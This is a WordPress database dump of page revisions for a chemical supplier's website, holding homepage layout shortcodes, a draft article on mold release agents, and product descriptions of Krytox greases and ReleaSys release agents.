INSERT INTO `wp_posts` VALUES (1529, 1, '2016-09-12 15:12:38', '2016-09-12 15:12:38', '[ux_banner_grid]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="3"]\n\n[ux_banner height="500px" bg="1027"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 15:12:38', '2016-09-12 15:12:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1530, 3, '2016-09-12 15:13:02', '2016-09-12 15:13:02', 'Mold release agents provides the critical barrier between a tooling surface and the materials molded, enabling separation of the cured part from the mold. There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol, PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Sufficient surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of molded parts per release agent application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect signigficantly more releases per application and little to no cleaning with the aforementioned agents.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing mold release solutions for it customer, hence', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 15:13:02', '2016-09-12 15:13:02', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1532, 1, '2016-09-12 15:25:24', '2016-09-12 15:25:24', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="500px" bg="1027"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 15:25:24', '2016-09-12 15:25:24', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1533, 3, '2016-09-12 15:25:34', '2016-09-12 15:25:34', 'Mold release agents provides the critical barrier between a tooling surface and the materials molded, enabling separation of the cured part from the mold. There are several distinct release agent systems: Sacrificial, PVA (polyvinyl alcohol, PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Sufficient surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Level of surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of molded parts per release agent application</li>\r\n</ul>\r\nRelease agents types and individual products within the types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release products will see a return on that investment in their bottom line.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest costing materials, offering adequate slip and chemical inertness.  Unfortunately these agents must re-applied after each molding process, and will transfer to molding part, thus requiring time-consuming cleaning of the mold part.  Interestingly, while the initial cost may be lower than PTFE or thermosett polysiloxanes, the overall cost is substantially more are one can expect significantly more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent systems.  In an effort to help guide process engineers in the selecting which agent would work best for their molding application we have summarized the leading attributes of for each agent.', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-09-12 15:25:34', '2016-09-12 15:25:34', '', 1525, 'https://132.148.10.86/wordpress/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1534, 1, '2016-09-12 15:26:37', '2016-09-12 15:26:37', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="500px" bg="78"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 15:26:37', '2016-09-12 15:26:37', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1535, 1, '2016-09-12 15:27:55', '2016-09-12 15:27:55', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 15:27:55', '2016-09-12 15:27:55', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1536, 1, '2016-09-12 15:40:22', '2016-09-12 15:40:22', '', 'ReleaSys 89', '<p>ReleaSys 89 is a nonflammable solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates.&nbsp;This formulation is particularly effective on difficult molding application or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:</p><ul><li>Exceptional durability and surface adhesion</li><li>High Slip;Ideal for complex mold geometries</li><li>Improves quality of molded parts</li><li>Minimal mold build up</li></ul>', 'inherit', 'closed', 'closed', '', '425-autosave-v1', '', '', '2016-09-12 15:40:22', '2016-09-12 15:40:22', '', 425, 'https://132.148.10.86/wordpress/425-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1537, 2, '2017-08-18 17:30:06', '2017-08-18 17:30:06', 'Krytox 240AZ grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 149ºC and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are non-flammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the recertification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n\nApplications for Krytox 240AZ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n\nIn the aerospace industry, Krytox 240AZ grease is applied in various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from -57 to 149ºC. In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\n\n<a href="https://www.miller-stephenson.com/krytox-aviation/">Click here to learn more about Aviation applications.</a>\n<a href="https://www.miller-stephenson.com/krytox-agl-683-gearbox-grease/">Click here to learn more about Aviation Gear Box Grease</a>', '240AZ', 'Krytox 240 AZ is a <strong>MIL PRF-27617 TYPE I</strong> grease. It also has NSF H-1 rating for incidental food contact. If Krytox 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification. Krytox 240AZ is the lowest viscosity grease of the 240 series greases. Ideal for applications that require a very low viscosity grease. Temperature is -57 to 149°C. \n<br><br/>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '638-autosave-v1', '', '', '2017-08-18 17:30:06', '2017-08-18 17:30:06', '', 638, 'https://132.148.10.86/wordpress/638-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1538, 2, '2017-08-18 17:38:42', '2017-08-18 17:38:42', '<h2>Krytox 240 AB - Military Spec Aerospace &amp; Aviation Greases</h2>\n<h3>MIL PRF-26717 TYPE II &amp; NSF H-1 RATED</h3>\nKrytox 240AB grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are non-flammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the recertification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\n\nApplications for Krytox 240AB lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\n\nIn the aerospace industry, Krytox 240AB grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.\n\nKrytox™ is a trademark of the Chemours Company FC, LLC.', 'Krytox 240AB', 'Krytox 240AB is a <strong>MIL PRF-27617 TYPE II</strong> greases. It is also NSF H-1 Rated for incidental food contact. Viscosity @ 20°C is 240 cSt and Viscosity @ 38°C is 86 cSt. The 240AB is ideal in -40 to 232°C environments. \n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '643-autosave-v1', '', '', '2017-08-18 17:38:42', '2017-08-18 17:38:42', '', 643, 'https://132.148.10.86/wordpress/643-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1539, 1, '2016-09-12 16:04:19', '2016-09-12 16:04:19', '', '280AB', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n<br /><br />\r\nKrytox 280 Series contain 1% sodium nitrite whereas Krytox 283 Series contain 5% sodium nitrite.\r\n\r\n', 'inherit', 'closed', 'closed', '', '649-autosave-v1', '', '', '2016-09-12 16:04:19', '2016-09-12 16:04:19', '', 649, 'https://132.148.10.86/wordpress/649-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1540, 1, '2016-09-12 16:08:25', '2016-09-12 16:08:25', '', '240AC', 'Krytox 240 series greases are white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.\r\n<br /><br />\r\nKrytox 240 AZ, 240 AB and 240 AC are MIL PRF-27617 greases. If Krytox 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<br /><br />\r\nKrytox 240 AC, 240 AB and 240 AZ gr-1 greases now have NSF approval for incidental food contact (H-1) in and around food processing areas.', 'inherit', 'closed', 'closed', '', '644-autosave-v1', '', '', '2016-09-12 16:08:25', '2016-09-12 16:08:25', '', 644, 'https://132.148.10.86/wordpress/644-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1541, 1, '2016-09-12 16:11:14', '2016-09-12 16:11:14', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80"]\r\n\r\n[text_box width="40" width__sm="60"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:11:14', '2016-09-12 16:11:14', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1543, 1, '2016-09-12 16:20:10', '2016-09-12 16:20:10', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="40" width__sm="60"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:20:10', '2016-09-12 16:20:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1544, 1, '2016-09-12 16:35:29', '2016-09-12 16:35:29', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="15"]\n\n<H3><p><em>Quality &amp; Service</em></p></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX & LUBRICANTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="1078" bg_color="rgb(13, 63, 106)"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL CHEMICALS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4 class="alt-font">INTRODUCING</h4>\n[divider]\n\n<h1>ReleaSys <strong>™ </strong></h1>\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\n[button text="TELL ME MORE" style="white alt-button" link="introducing-releasys-our-newest-release-agent/"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1259" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1253" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1249" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1248"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="595"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1261"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1255"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1257"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-12 16:35:29', '2016-09-12 16:35:29', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
